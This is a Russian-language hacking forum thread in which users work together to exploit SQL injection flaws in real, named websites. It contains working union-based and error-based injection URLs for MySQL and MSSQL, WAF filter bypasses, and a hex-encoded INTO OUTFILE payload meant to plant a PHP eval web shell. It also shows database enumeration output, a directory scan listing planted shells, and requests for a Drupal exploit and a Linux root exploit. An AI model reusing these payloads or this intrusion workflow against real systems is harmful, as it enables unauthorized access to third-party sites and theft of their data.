Ваши вопросы по уязвимостям.

1. Подобрать кол-во полей, а не пытаться сразу лить шелл

Code:

http://www.buddhatour.ru/new/?link=1+union+select+1,version(),3,4+limit+1,1--+

или так:

http://www.buddhatour.ru/new/?link=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+

2. file_priv=N, ни о какой заливке шелла через скулю здесь речи идти не может.

 

В union select во-первых 4 столбца, во-вторых magic_quotes = On

Но это можно обойти, так как второй параметр учавствует в другом запросе...

Code:

http://www.buddhatour.ru/new/?link=-1+union+select+1,0x3120616E64202873656C65637420273C3F706870206576616C28245F4745545B765D293B3F3E2720696E746F206F757466696C6520272F686F6D652F627564646861746F75722F646174612F7777772F627564646861746F75722E72752F65652E7068702729,3,4


Второй столбец это "1 and (select '<?php eval($_GET[v]);?>' into outfile '/home/buddhatour/data/www/buddhatour.ru/ee.php')"

Но тут мы опять же ничего не получаем

Code:

Access denied for user 'buddhatour_budd'@'localhost' (using password: YES)

Вроде бы так...
Пока писал, меня 2 раза опередили)

 

вопрос чисто теоретический:

при раскрутке стандартной mssql инъекции пару раз сталкивался что при запросе:

1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='table_name'+AND+COLUMN_NAME+NOT+IN+('column'))--

скуль плевать хотела на имя таблицы и выдавала колонки из всех таблиц в алфавитном порядке. именно поэтому, на мой взгляд, возникали проблемы с автоматическими инжекторами, которые не могли вывести колонки.

собственно вопрос, почему выводятся все колонки из всех таблиц, а не из заданой?

 

Пример в студию ускорил бы решение вашей проблемы, да, бывают специфичные ситуации

PS: Вообще not in и перечислять там имена колонок тупо - тухлец способ по определению

Вот если брать одну из mssql-инъекций в "Ваши sql-инъекции":

https://forum.antichat.ru/showpost.php?p=2168515&postcount=12236

Code:

http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=@@version--

то для выяснения колонок из таблицы User ми бы рекомендовал бы такую конструкцию (как показала практика - самая универсальная для различных ситуаций):

Code:

http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+and+column_name+not+in+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+order+by+column_name)+order+by+column_name)a)--

получим City

Code:

http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+and+column_name+not+in+(select+top+2+column_name+from+information_schema.columns+where+table_name=char(85)%2bchar(115)%2bchar(101)%2bchar(114)+order+by+column_name)+order+by+column_name)a)--

получим Class

.....

во втором случае меняется

.....not+in+(select+top+2....

 

примерчик:

http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=%28SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=%27Utenti%27+AND+COLUMN_NAME+NOT+IN+%28%27binary_message_body%27,%27cap%27,%27Cat%27,%27Categoria%27,%27cell%27,%27cod%27,%27conversation_group_id%27,%27conversation_handle%27,%27data%27,%27fax%27,%27figli%27,%27fragment_bitmap%27,%27fragment_size%27,%27fuma%27,%27h%27,%27hob%27,%27id%27,%27Idc%27,%27ind%27,%27lingue%27,%27mail%27,%27message_id%27,%27message_sequence_number%27,%27message_type_id%27,%27nazione%27,%27newsCorpo%27,%27newsDataInserim%27,%27newsFoto%27,%27newsId%27,%27newsSospesa%27,%27newsTitolo%27,%27next_fragment%27,%27nome%27,%27occ%27,%27p%27,%27paese%27,%27patn%27,%27person%27,%27priority%27,%27prof%27,%27prov%27,%27queuing_order%27,%27regi%27,%27resp%27,%27service_contract_id%27,%27service_id%27,%27skype%27,%27stato%27,%27status%27,%27tel%27,%27titolo%27,%27url1%27,%27url2%27,%27url3%27,%27url4%27,%27urlpic%27,%27userId%27,%27userLevel%27,%27userName%27,%27userPwd%27%29%29--

а что есть не из тухлых способов?

 

вот конкретно относительно вашего примерчика и таблицы News:

Code:

HOST: www.feliceincontro.net
-----------------------------------------
System information:
-----------------------------------------
@@version: Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) 
	May 26 2009 14:24:20 
	Copyright (c) 1988-2005 Microsoft Corporation
	Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

system_user: MSSql18332
db_name(): MSSql18332
=============================================
Tables in information_schema:
=============================================
  annunci
  foto
  Categoria
  News
  Utenti
  sedi
-----------------------------------------
Columns from table [ News ]
-----------------------------------------
  newsCorpo - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+0+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsDataInserim - - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsFoto - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+2+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsTitolo - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+5+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsSospesa - колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+4+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

  newsId -  колонка

  http://www.feliceincontro.net/incontri/foto/ContattoAnnIntNaz.asp?cod=2422+or+1=(select+max(column_name)+from+(select+top+1+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+and+column_name+not+in+(select+top+3+column_name+from+information_schema.columns+where+table_name=char(78)%2bchar(101)%2bchar(119)%2bchar(115)+order+by+column_name)+order+by+column_name)a)

 

Сп... но написано, что "Этот файл всё ещё заливается!". Залей еще куданить, pls

 

здесь sql inj ?

ето филтрация ?
и как обходит ?

 

Методом "тыка" удалось извлечь, все что попадает в параметр id и этот же момент != int, идет под откос.

Присутствует проверка от "неправильных" обращений к серверу. Паблик способами решить эту проблему не сможете.

 

Все правильно написано только смущает одно, что там два залитых шелла!

» http://oragir.am/.htaccess HTTP 403 Forbidden
» http://oragir.am/.htconfig HTTP 403 Forbidden
» http://oragir.am/.htpasswd HTTP 403 Forbidden
» http://oragir.am/cgi-bin/ HTTP 403 Forbidden
» http://oragir.am/cgi-sys/ HTTP 403 Forbidden
» http://oragir.am/images/ HTTP 403 Forbidden
» http://oragir.am/js/ HTTP 403 Forbidden
» http://oragir.am/new/ HTTP 200 OK
» http://oragir.am/_private/ HTTP 401 Authorization Required
» http://oragir.am/includes/ HTTP 200 OK
» http://oragir.am/server-status/ HTTP 403 Forbidden
» http://oragir.am/error_log HTTP 403 Forbidden
» http://oragir.am/administrator/ HTTP 200 OK
» http://oragir.am/also order_log.dat HTTP 403 Forbidden
» http://oragir.am/cpanel/ HTTP 301 Moved Permanently
» http://oragir.am/icons/ HTTP 200 OK
» http://oragir.am/index.php HTTP 200 OK
» http://oragir.am/lang/ HTTP 403 Forbidden
» http://oragir.am/manual/ HTTP 200 OK
» http://oragir.am/news/ HTTP 403 Forbidden
» http://oragir.am/phpmyadmin/ HTTP 401 Authorization Required
» http://oragir.am/phpshell.php HTTP 403 Forbidden
» http://oragir.am/shell.php HTTP 403 Forbidden
» http://oragir.am/webadmin.nsf HTTP 403 Forbidden
» http://oragir.am/webmail/ HTTP 301 Moved Permanently
• Possible engine => FrontPage:
» http://oragir.am/_vti_bin/ HTTP 403 Forbidden
» http://oragir.am/_vti_bin/_vti_adm/ HTTP 403 Forbidden
» http://oragir.am/_vti_bin/_vti_aut/ HTTP 403 Forbidden
» http://oragir.am/_vti_cnf/ HTTP 403 Forbidden
» http://oragir.am/_vti_log/ HTTP 403 Forbidden
» http://oragir.am/_vti_pvt/ HTTP 403 Forbidden
» http://oragir.am/_vti_txt/ HTTP 403 Forbidden

 

Url уязвим :

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts%27

Query failed - reason1:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Darts'')' at line 1

попробовать много, но я не могу найти SQLI и столбцов

 

2 linuxkernal
если понадобится закомментировать оставшуюся часть запроса, то можно вприницпе так

Code:

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts')+and+substring(version(),1,1)=5**+

А вот union select вставить не получилось, потому что выдает 403 даже на asdunionasdselectasd

 

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=1')+ORDER+BY+22%23

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999')+/*!UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23

хмм фильтр обошел но незнаю зачем она ругается...

 

Смотри внимательно ошибку. * заменяется на -

 

Code:

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=9999999%27%29+and+%27/*%27+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23

хех, видимая)
общими усилиями, так сказать, раскрутили..)

 

Так, предыдущий пост удалил, чтобы было немонго понятней (Сюда закинул только блинку). Вообщем вот она.

http://www.jocuripentrucopii.eu/play_game.php?nume_joc=Darts')+and+substring(version(),1,1)=5+and+1=('1

И все же докрутил как хотел, кому интересно, вот > http://www.jocuripentrucopii.eu/play_game.php?nume_joc=')+or+(select+Count(0),Concat(version(),floor(rand(0)/(1/2)))from(information_schema.columns)GROUP+by+2)=(1,'1

 

Народ помогите разобраться как заюзать багу. Не могу сообразить как надо сформировать запрос. Вот типа патч от этой баги. http://drupal.org/files/sa-2008-067/SA-2008-067-5.11.patch
Я та понял что можно подменить занчение $_SERVER['HTTP_HOST'] , но блин ничего не выходит ;(

 

v1d0qz , значит нет варианта ?

http://oragir.am/news.php?id=13%27a

 

Посоветуйте рут сплойт для:
Linux *.com 2.6.32.10-90.fc12.i686.PAE #1 SMP Tue Mar 23 10:04:28 UTC 2010 i686
Что-то подходящего не нашел

 

Дату смотри. Сам то как думаешь, есть ли такие вещи в паблике? )